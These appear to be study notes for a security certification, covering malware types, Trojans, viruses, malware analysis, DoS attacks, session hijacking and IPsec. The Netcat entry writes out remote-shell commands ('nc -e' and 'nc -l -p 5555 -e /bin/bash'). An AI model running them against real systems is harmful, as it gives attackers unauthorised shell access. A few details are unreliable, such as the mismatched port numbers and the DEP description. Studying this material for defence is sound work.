10-Malware and Other Attacks

Table of Contents

Malware and Other Attacks

Malware

Malware Basics

  • Software designed to harm or secretly access a computer system without informed consent

  • Most is downloaded from the Internet with or without the user's knowledge

  • Overt Channels: legitimate communication channels used by programs

  • Covert Channels: used to transport data in unintended ways

  • Wrappers: programs that allow you to bind an executable to an innocent file

    • Example: IExpress Wizard

  • Crypters

    • Using a combination of encryption and code manipulation to render malware undetectable to security programs

    • Example: BitCrypter

  • Packers

    • Compressing the executable into a smaller size, and obscure the actual program, which helps evade signature based detection

    • Entry point of an executable may refer to a named section of code where the label is the name of a packer

  • Droppers: installing other malware files on to system either from malware package or Internet

  • Downloader: downloading other malware from Internet on to PC

  • Injector: injecting its code into other vulnerable running process and changes the way of execution in order to hide or prevent removal

  • Obfuscator: concealing its code, makes it hard for security mechanisms detect or remove it

  • Exploit Kit: helping to deliver exploits and payloads, like Crimepack

Trojan

  • Software that appears to perform a desirable function but instead performs malicious activity

  • To hackers, it is a method to gain and maintain access to a system

  • Trojans are means of delivery whereas a backdoor provides the open access

Types of Trojans

  • Remote Access Trojan (RAT): providing attackers with full control over the victim's system, enabling them to remotely access files, private conversations, accounting data, and others

    • PoisonIvy

    • MoSucker

    • Blackhole

  • Backdoor Trojan: RAT has UI, the client component, whereas a backdoor does not

  • Botnet Trojan: infecting numerous of computers across a large geographical area to create a network of bots that is controlled through a Command and Control (C&C) center

    • Necurs

    • Mirai

  • E-banking Trojans: intercepting victim's account informed before the system can encrypt it, and send it to the attacker's C&C center

    • Zeus

  • Proxy Server Trojan: usually a standalone application that allows remote attackers to use the victim's computer as a proxy to connect to the Internet

  • Covert Channel Tunneling Trojan (CCTT): a RAT, creating arbitrary data transfer channels in previously authorized data streams

  • Defacement Trojan: once spreading over the system, can destroy or change the entire content present in a database

  • Command Shell Trojan: providing a backdoor to connect to through command-line access

    • Netcat

      • "Swiss army knife" of tcp/ip hacking

      • Providing all sorts of control over a remote shell on a target

      • Can connect over TCP or UDP, from any port

      • Offering DNS forwarding, port mapping and forwarding and proxying

      • Connect: nc -e IPaddress Port#

      • Open a listening port on 55555 from target machine: nc -l -p 5555 -e /bin/bash

    • CryptCat: encrypted version of netcat

Some Trojan Port Numbers

Trojan Name

Port

Death

2

Senna Spy

20

Hackers Paradise

31,456

TCP Wrappers

421

Doom, Santaz Back

666

Silencer, WebEx

1001

RAT

1095-98

SubSeven

1243

Shiva-Burka

1600

Trojan Cow

2001

Deep Throat

6670-71

NetBus

12345-6

Whack a Mole

12361-3

Back Orifice

31337,8

Tools

  • Process Explorer (PE): Microsoft tool that shows you everything about running processes

  • Registry Monitoring Tools

    • SysAnalyzer

    • Active Registry Monitor

    • Regshot

  • Tripwire: integrity verifier that can act as a HIDS in protection against Trojans

  • SIGVERIF: building into Windows to verify the integrity of the system

    • Log file can be found at c:\windows\system32\sigverif.txt

    • Looking for drivers that are not signed

Virus

  • Self-replicating program that reproduces by attaching copies of itself into other executable code

  • Usually installed by user clicking on malicious file attachments or downloads

Types of Viruses

  • Virus Hoax: a kind of bluff and false alarm claiming reports about nonexistent viruses to cause fear

  • Fake Antivirus: trying to convince a user has a virus and have them download an AV that is a virus itself

  • Ransomware: malicious software designed to deny access to a computer until a price is paid; usually spread through email

    • Locky: Using RSA-2048 and AES-128 to lock files

    • WannaCry: famous ransomware, within 24 hours had 230,000 victims, exploited unpatched SMB vulnerability

    • Petya-NotPetya: spreading over network using WMIC (Windows Management Instrumentation Command-line) by capturing all credentials from local machine using Mimikatz

  • Boot Sector Virus: known as system virus, moving boot sector to another location and then inserts its code in the original location

  • Shell Virus: wrapping around an application's code, inserting itself before the application's

  • Cluster Virus: modifying directory table entries so every time a file or folder is opened, the virus runs

  • Multipartite Virus

    • Attempting to infect both boot sector and files

    • Generally referring to viruses with multiple infection methods, or executing different in different places on target at the same time

  • Macro Virus: written in VBA, infects template files, mostly MS Word and MS Excel

  • Polymorphic Code Virus: mutating its code by using a polymorphic engine; difficult to find because code is always changing

  • Encryption Virus: using encryption to hide the code from antivirus

  • Metamorphic Virus: rewriting itself every time it infects a new file

    • Win32/ Simile

    • Zmist: Mistfall is the first virus uses technique called code integration. This code inserts itself into other code and regenerates code and rebuilds the executable

  • Stealth Virus: known as tunneling virus, attempts to evade AVs by actively altering and corrupting the service call interrupts while running

  • Cavity Virus: overwriting portions of host files as to not increase the actual size of the file; uses null content sections

  • Armored Virus: containing a variety of mechanisms specifically coded to make its detection and decryption very difficult

  • Companion/Camouflage Virus: spoofing a scanner by camouflaging itself to the identical file name as targeted program file

  • Cluster Virus: modifying directory table entries so that it points users or system processes to the virus code instead of the actual program

  • Sparse Infector Virus

    • Only infecting occasionally, like every tenth program executed

    • Deciding which file to infect based on certain conditions, like target file with max. size of 128kb

  • File Extension Virus: changing the file extensions of files to take advantage of most people having them turned off (readme.txt.vbs shows as readme.txt)

  • Logic Bomb Virus: triggered by a response to an event, such as launching an application or when a specific date/time is reached

Worm

  • Self-replicating malware that sends itself to other computers without human intervention

  • Usually doesn't infect files, just resides in active memory

  • Often used in botnets

Analyzing Malware

  • Sheep Dip: referring to analysis of suspect files

  • Sheep Dip Computer: installed with port monitors, file monitors, network monitors and antivirus software, connects to a network only under strictly controlled conditions

Static Analysis

  • Dismantling of a given executable into binary format to study its functionalities and features

  • Tools

    • HashMyFiles: file fingerprinting

    • VirusTotal: online malware scanning

    • PEiD: identifying packing/obfuscation methods

    • Dependency Walker: listing all dependent modules of an executable file

    • IDA Pro: disassembler and debugger

Dynamic Analysis

  • Running malware and identifying changes to the system, usually in a sandbox environment

    1. Make sure you have a good test bed

      • Use a VM with NIC in host-only mode and no open shares

    2. Analyze the malware on the isolated VM in a static state

      • Tools - binText and UPX help with looking at binary

    3. Run the malware and check out processes

      • Use Process Monitor, etc. to look at processes

      • Use NetResident, TCPview or even Wireshark to look at network activity

    4. Check and see what files were added, changed, or deleted

Heuristic Analysis

  • Detecting new or unknown viruses that are usually variants of an already existing virus family

  • Drawback: too many false positives

  • Can be static or dynamic

    • Static Heuristic Analysis: The anti-virus analyzes the file format and code structure to determine if the code is viral

    • Dynamic Heuristic Analysis: The anti-virus performs a code emulation of the suspicious code to determine if the code is viral

Tools

  • IDA Pro

  • Anubis

  • Threat Analyzer

Preventing Malware

  • Make sure you know what is going on in your system

  • Have a good antivirus that is up to date

  • DEP (Data Execution Prevention): prevents from accidentally executing a potentially malicious batch or PowerShell script in Windows

  • DLP (Data Loss Prevention): a strategy for preventing end users from sending sensitive or critical information outside of the corporate network

DoS (Denial of Service) Attacks

  • Seeking to take down a system or deny access to it by authorized users

  • Botnet: network of zombie computers a hacker uses to start a distributed attack

    • Can be controlled over HTTP, HTTPS, IRC, or ICQ

Basic Categories

  • Fragmentation Attack: taking advantage of the system's ability to reconstruct fragmented packets

  • Volumetric Attack: bandwidth attack, consuming all bandwidth for the system or service

  • Application Attack

    • Consuming the resources necessary for the application to run

    • Application level attack is against weak code

    • Application attack is just the general term

  • TCP state-exhaustion Attack: going after load balancers, firewalls and application servers by attacking connection state tables

  • SYN Flood: sending thousands of SYN packets with fake source IP address and not responding to the SYN/ACK packets; lots of half connections where the 3-way hanndshake is never completed; eventually target runs out of resources

  • ICMP flood: sending ICMP ECHO packets with a spoofed address; eventually reaches limit of packets per second sent

  • Smurf: sending large number of pings to the broadcast address of the subnet with source IP spoofed as the target, entire subnet responds exhausting the target; using ICMP ECHO requests

  • Fraggle: same as Smurf but with UDP packets

  • Ping of Death: fragmenting ICMP messages, after reassembled, ICMP packet is larger than the maximum size and crashes the system

  • Teardrop: overlapping numerous garbled TCP/IP fragments with oversized payloads, causes older systems to crash due to fragment reassembly

  • Phlashing: also known as bricking a system, causing permanent damage to a system

  • LAND Attack (Local Area Network Denial): sending a TCP SYN packet to the target with a spoofed IP the same as the target; if vulnerable, target loops endlessly and crashes

  • DDoS (Distributied Denial of Service): incoming traffic flooding the victim originates from many different sources

  • DRDoS (Distributied Reflexion Denial of Service): using IP spoofing, the source address is set to targeted victim, which means all the replies will go to the target and flood the target

  • Slowloris: trying to keep many connections to the target web server open and hold them open as long as possible

Tools

  • Low Orbit Ion Cannon (LOIC): DDoS tool that floods a target with TCP, UDP or HTTP requests

  • Trinity: Linux based DDoS tool

Session Hijacking

  • Attacker waits for a session to begin and after the victim authenticates, steals the session for himself

  • Predicting can be done by knowing the window size and the packet sequence number

  • Also can be done via brute force, calculation or stealing

Steps

  1. Sniff the traffic between the client and server

  2. Monitor the traffic and predict the sequence numbering

  3. Desynchronize the session with the client

  4. Predict the session token and take over the session

  5. Inject packets to the target server

Countermeasures

  • Using unpredictable session IDs

  • Limiting incoming connections

  • Minimizing remote access

  • Regenerating the session key after authentication

  • Using IPsec to encrypt

IPsec (Internet Protocol Security)

  • Transport Mode

    • Payload and ESP trailer are encrypted, not IP header

    • Can be used in NAT because the original packet is still routed in exactly the same manner as it would have been without IPsec

  • Tunnel mode

    • Everything is encrypted

    • Cannot be used with NAT

  • Architecture Protocols

    • Authentication Header: guarantying the integrity and authentication of IP packet sender

    • Encapsulating Security Payload (ESP): providing origin authenticity and integrity as well as confidentiality

    • Internet Key Exchange (IKE): producing the keys for the encryption/decryption process, port 500

    • Oakley: using Diffie-Hellman to create master and session keys

    • Internet Security Association Key Management Protocol (ISAKMP): software that facilitates encrypted communication between two endpoints

Tools

  • Ettercap: man-in-the-middle tool and packet sniffer on steroids

  • Zaproxy

  • Paros proxy

  • Burp Suite

  • Hamster

  • IKE-scan: IPsec VPN scanning and fingerprinting tool

Previous09-Security in Cloud ComputingNext11-Cryptography

Last updated